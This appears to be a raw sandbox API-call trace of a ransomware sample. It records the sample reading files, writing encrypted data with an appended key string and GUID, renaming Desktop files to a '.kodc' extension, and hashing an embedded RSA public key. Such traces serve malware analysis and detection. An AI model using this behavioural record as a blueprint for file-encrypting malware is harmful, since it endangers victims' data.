[0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6e8 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6d0 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6a0 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a688 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333ff90 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0097.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0097.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0097.746] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0xb92a, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xb92a, lpOverlapped=0x0) returned 1 [0097.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0097.746] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb92f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.746] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0097.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0097.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.747] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0097.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.747] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.747] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.747] CloseHandle (hObject=0x5cc) returned 1 [0097.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0097.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.748] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hCF6SL6FoYE73x.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hcf6sl6foye73x.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hCF6SL6FoYE73x.mp4.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hcf6sl6foye73x.mp4.kodc")) returned 1 [0097.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.749] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0097.750] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fb7e900, ftCreationTime.dwHighDateTime=0x1d5bc85, ftLastAccessTime.dwLowDateTime=0xa96cc610, ftLastAccessTime.dwHighDateTime=0x1d5c120, ftLastWriteTime.dwLowDateTime=0xa96cc610, ftLastWriteTime.dwHighDateTime=0x1d5c120, nFileSizeHigh=0x0, nFileSizeLow=0x15f46, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="he-u.swf", cAlternateFileName="")) returned 1 [0097.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0097.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.750] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\he-u.swf") returned=".swf" [0097.750] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\he-u.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\he-u.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.750] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=89926) returned 1 [0097.750] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.753] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15f20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.753] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.754] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.754] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x15f46, lpOverlapped=0x0) returned 1 [0097.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.755] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0097.756] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.756] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.756] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.756] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.756] GetLastError () returned 0x0 [0097.756] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.756] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0097.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.756] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.756] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.756] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x15f50) returned 0x9ba4d90 [0097.756] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333ff90 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a688 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333ffd8 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6a0 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6d0 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6e8 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.757] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0097.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6d0 | out: hHeap=0x630000) returned 1 [0097.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6e8 | out: hHeap=0x630000) returned 1 [0097.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a6e8 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a6d0 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0097.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6e8 | out: hHeap=0x630000) returned 1 [0097.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6d0 | out: hHeap=0x630000) returned 1 [0097.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0097.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.759] GetCurrentThreadId () returned 0x42c [0097.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x6960f8 [0097.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0097.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.759] GetCurrentThreadId () returned 0x42c [0097.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6d0 [0097.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0097.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6e8 [0097.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6b8 [0097.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a700 [0097.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0097.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0097.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6d0 | out: hHeap=0x630000) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6d0 [0097.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0097.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0097.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0097.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0097.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6d0 | out: hHeap=0x630000) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0097.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 